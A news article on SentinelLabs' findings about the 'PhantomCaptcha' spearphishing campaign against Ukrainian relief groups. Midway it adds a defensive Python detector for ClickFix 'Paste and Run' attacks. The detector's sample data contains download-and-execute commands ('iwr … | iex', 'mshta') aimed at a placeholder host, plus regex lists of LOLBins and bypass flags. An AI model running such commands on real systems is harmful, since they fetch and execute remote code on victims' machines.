Ukraine war relief workers
Ukrainian Red Cross personnel respond to an attack in Kyiv's Solomianskyi district in June 2025. Image: Ukrainian Red Cross / State Emergency Service of Ukraine

'PhantomCaptcha' hackers impersonate Ukrainian president’s office in attack on war relief workers

Cybersecurity researchers have uncovered a mysterious spearphishing campaign impersonating the Ukrainian president’s office that disappeared on the same day it was launched in a bid to compromise organizations involved in war relief efforts.

According to a report published Wednesday by cybersecurity company SentinelLabs, the single-day campaign on October 8 targeted individual members of the International Committee of the Red Cross, the Norwegian Refugee Council and the U.N. Children’s Fund (UNICEF) alongside other NGOs involved in war relief efforts.

Although it remains unclear who was behind the campaign, tracked as “PhantomCaptcha,” the target list suggests the perpetrator was “seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts” related to support for Ukraine, SentinelLabs said.

The hackers also targeted Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava and Mikolaevsk regions when they sent emails containing weaponized PDFs pretending to be official communications from the Office of the President of Ukraine.

Tom Hegel, the research lead at SentinelOne, wrote that despite six months of preparation — going by the initial infrastructure registration to the day of attack execution — the spearphishing campaign was only active for a single day before that infrastructure was taken offline, “indicating sophisticated planning and strong commitment to operational security.”

The hackers behind the campaign sent targets a convincing eight-page document that was intended to start their victims along a sophisticated multistage attack chain exploiting their trust and bypassing traditional security controls.

If a victim clicked on the embedded link in the PDF, they could be redirected to a domain masquerading as a legitimate website for the teleconference app Zoom that was in reality a server owned by Russian provider KVMKA.

A Zoom call, or perhaps worse

Although the server stopped resolving on the same day the attempted attack took place, SentinelLabs was able to retrieve the server response from the VirusTotal repository. It was a fake, but convincing, Cloudflare DDoS protection gateway.

The fake gateway allowed for two different potential methods of compromising the victims’ devices. Victims could either be redirected to a real password-protected Zoom meeting, which Hegel wrote could have enabled live social engineering calls with them, or they could be tricked into unwittingly executing commands copied to their clipboard. Researchers call the latter a “ClickFix” or “Paste and Run” technique.

The PhantomCaptcha variant of this attack, as described by SentinelLabs, tricks Windows users into copying a “token” from the fake Cloudflare DDoS protection gateway, pressing Windows + R, pasting the “token” and then executing it. The “token” is actually a PowerShell script designed to compromise their computer.

“This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files,” the researchers said.
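Because the user types the command into the Run dialog, file-based controls see nothing, but the action still leaves host artifacts that defenders can hunt for. The following is an added example (not code from SentinelLabs’ report, and it reproduces no payload from this campaign) that scores Run-dialog history and process-creation records for the combination of traits a “Paste and Run” command typically carries: a script interpreter, a hidden window, an execution-policy bypass, a remote fetch and an inline evaluation. It relies on two facts about Windows: the Run dialog records each command under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (as `<command>\1`, with `MRUList` giving most-recent-first order), and a Run-dialog launch appears in process-creation telemetry (Sysmon Event ID 1 style) as an interpreter whose parent is `explorer.exe`. All sample registry values and process records below are constructed for the example, and the rule names and score threshold are the author's own choices.

```python
r"""Heuristic detection of ClickFix / "Paste and Run" style executions.

Two constructed data sources are checked:
  1. RunMRU values: Windows stores each Win+R (Run dialog) command under
     HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as
     "<command>\1"; the "MRUList" value gives most-recent-first order.
  2. Process-creation records (Sysmon Event ID 1 style) where a script
     interpreter is spawned directly by explorer.exe, which is what a
     Run-dialog launch looks like.
All sample data in this file is constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# Constructed RunMRU values (key letters map to commands; "MRUList" is the order).
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/t | iex"\\1',
    "c": "cmd /c mshta http://example.invalid/v\\1",
    "d": "calc\\1",
    "MRUList": "dcba",
}

# Constructed process-creation records.
SAMPLE_PROCESSES = [
    {"image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/t | iex"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell Get-Process"},
]

# A command only scores at all if it names an interpreter or LOLBin.
INTERPRETER = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|certutil|bitsadmin|curl)(\.exe)?\b",
    re.I)

# Each rule is (name, pattern); the score is the number of rules that match.
RULES = [
    ("hidden_window", re.compile(r"-(w|win|windowstyle)\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-(ep|exec|executionpolicy)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("remote_fetch", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|webclient)\b", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("url_present", re.compile(r"https?://", re.I)),
    ("lolbin_runner", re.compile(r"\b(mshta|certutil|bitsadmin|rundll32)\b", re.I)),
]
MIN_SCORE = 2  # hypothetical threshold: two independent traits is enough to triage


@dataclass
class Finding:
    source: str          # "RunMRU" or "ProcessCreate"
    command: str
    score: int
    reasons: list = field(default_factory=list)


def score_command(cmd):
    """Return (score, matched rule names); 0 if no interpreter is named."""
    if not INTERPRETER.search(cmd):
        return 0, []
    reasons = [name for name, pattern in RULES if pattern.search(cmd)]
    return len(reasons), reasons


def parse_runmru(values):
    """Return Run-dialog commands most-recent-first, with the trailing "\\1" stripped."""
    commands = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def flag_runmru(values):
    """Findings for RunMRU entries that reach MIN_SCORE."""
    findings = []
    for cmd in parse_runmru(values):
        score, reasons = score_command(cmd)
        if score >= MIN_SCORE:
            findings.append(Finding("RunMRU", cmd, score, reasons))
    return findings


def flag_processes(records):
    """Findings for interpreters launched by explorer.exe with a suspicious command line."""
    findings = []
    for rec in records:
        if not rec.get("parent", "").lower().endswith("explorer.exe"):
            continue
        score, reasons = score_command(rec.get("cmdline", ""))
        if score >= MIN_SCORE:
            findings.append(Finding("ProcessCreate", rec["cmdline"], score, reasons))
    return findings


if __name__ == "__main__":
    for f in flag_runmru(SAMPLE_RUNMRU) + flag_processes(SAMPLE_PROCESSES):
        print(f"[{f.source}] score={f.score} {f.reasons}: {f.command}")
```

On a live host the RunMRU dictionary would come from the registry (for example via `winreg` or a collected hive) and the process records from the SIEM; the two checks corroborate each other, since RunMRU shows what the user pasted even if the resulting process was short-lived, while the explorer.exe-parent rule catches the launch even when the history key has been cleared.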

Although the attackers quickly took the public-facing lure domain offline, SentinelLabs found backend command-and-control infrastructure that remained active even after the initial attack day, “indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.”

The researchers found that the day afterward, October 9, a domain with a similar URL to the public-facing lure had been registered, “potentially indicating plans for continued operations.”

Their infrastructure analysis also turned up a link to a wider campaign “making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development,” although this campaign is being tracked as a separate cluster of activity.

Specifically, this campaign seemed to be themed around what the report described as “an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club,” including both a website and an APK designed to harvest a range of personal and device information from compromised victims.

The timeline of the PhantomCaptcha campaign suggested the perpetrator had “an understanding of both offensive operations and defensive detection capabilities,” added SentinelLabs, although the company said it was unable to attribute the cluster of activity to a known actor at the time it published the report.

The sophistication of the campaign was “indicative of an adversary capable of a high level of operational planning, evidenced in extended preparation, compartmentalized infrastructure, and deliberate exposure control,” the company said.

Alexander Martin is the UK Editor for Recorded Future News. He was previously a technology reporter for Sky News and is also a fellow at the European Cyber Conflict Research Initiative.